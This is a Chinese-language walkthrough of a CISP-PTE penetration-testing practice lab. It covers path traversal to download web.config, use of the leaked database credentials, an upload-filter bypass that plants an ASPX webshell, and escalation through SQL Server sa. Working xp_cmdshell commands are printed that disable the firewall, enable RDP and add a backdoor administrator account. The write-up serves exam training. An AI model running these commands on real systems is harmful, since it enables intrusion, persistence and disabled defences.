CISP-PTE靶机攻防

文章前言

CISP-PTE考试满分100分，包括20道选择题(每题1分)，5道操作题(每个key10分)，1道综合题(30分)，本篇文章对其中的操作题进行实践操作

环境搭建

Step 1：解压靶机环境压缩包

Step 2：使用Vmware Workstation打开环境

登录密码：admin123

成功登录：

靶机攻防

信息收集

端口扫描

首先进行端口扫描确定开启那些服务：

• 1433：Sql Server 服务
• 27689：Web服务

之后发现一个文件上传与下载系统：

目录扫描

使用御剑扫描目录：

访问http://192.168.59.139:27689/robots.txt获取信息，之后查看到一个affix目录

之后访问http://192.168.59.139:27689/upfile/affix/提示列目录失败

之后访问http://192.168.59.139:27689/admin/file_down.aspx，发现缺少参数file

文件下载

之后构造参数file进行测试，从中可以获取当前web网络路径信息

之后尝试使用../向上回溯一层目录：

发现可以成功回溯一层目录，之后通过多次fuzz之后最终回溯两层目录到web根目录并下载web.config

之后从web.config中发现数据库账号密码信息：

连数据库

之后使用上面发现的数据库连接信息连接数据库

之后获取Web账号密码：admin/asdadwn_d2112

登录WEB

之后使用之前获取的账号密码登录WEB系统

之后我们成功获取到了第一个Key:4k3s9m3d

GetShell

之后通过文件上传功能上传Webshell

很遗憾的发现不允许上传，看来是有限制：

之后发现管理文件模块有一处提示:"文件名过长会被系统截取包括系统时间在内的前32位字符作为文件名，请上传的文件名称不要过长，为您带来的不便，敬请谅解"

根据上面的提示以及实例我们可以将cisp-pte替换为我们新的webshell的名称，之后附加.aspx后缀进行上传：

之后连接webshell

之后在Web目录下找到Key2：

权限提升

之后通过Webshell查看当前用户的权限发现是普通用户权限

之后对C盘下Administrator文件夹内容进行访问发现拒绝访问，需要权限提升

之后通过浏览web目录发现历史web.config

进一步获取sa的账号密码信息，不得不说这为我们权限提升提供了最大的助力：

之后使用Navicate进行连接

之后通过执行SQL语句来查看权限，可以看到已然是system权限了，而这也是因为SQLServer默认是以system权限运行的，外加上sa权限导致我们可以直接获取到system权限：

use master;
exec master..xp_cmdshell "whoami";

关防火墙

下面我们要做的就是关闭防火墙开RDP了，在这里为了执行系统命令我们首先开启XP_cmdshell：

use master;
exec sp_configure 'show advanced options',1;
reconfigure;

exec sp_configure 'xp_cmdshell',1;
reconfigure;

之后关闭防火墙：

EXEC master.dbo.xp_cmdshell 'netsh firewall set opmode disable'

开启RDP

下一步自然而然就是开启RDP进行远程链接了，命令如下：

exec master.dbo.xp_cmdshell 'reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0 /f'

添加用户

为了实现RDP远程链接我们还需要创建一个用户账号并将其添加到管理员组：

exec master..xp_cmdshell "net user test12 123.com /add"
exec master..xp_cmdshell "net localgroup administrators test12 /add"
exec master..xp_cmdshell "net user test12"

远程连接

之后使用之前创建的账号进行远程链接操作：

之后我们在桌面成功获取到Key:

文末小结

本篇文章以CISP-PTE靶机作为演示实例进行了渗透测试，其中尤为突出信息收集的重要性以及灵活运用MSSQL进行权限提升的技巧，综合来看是一个不错的实践性靶机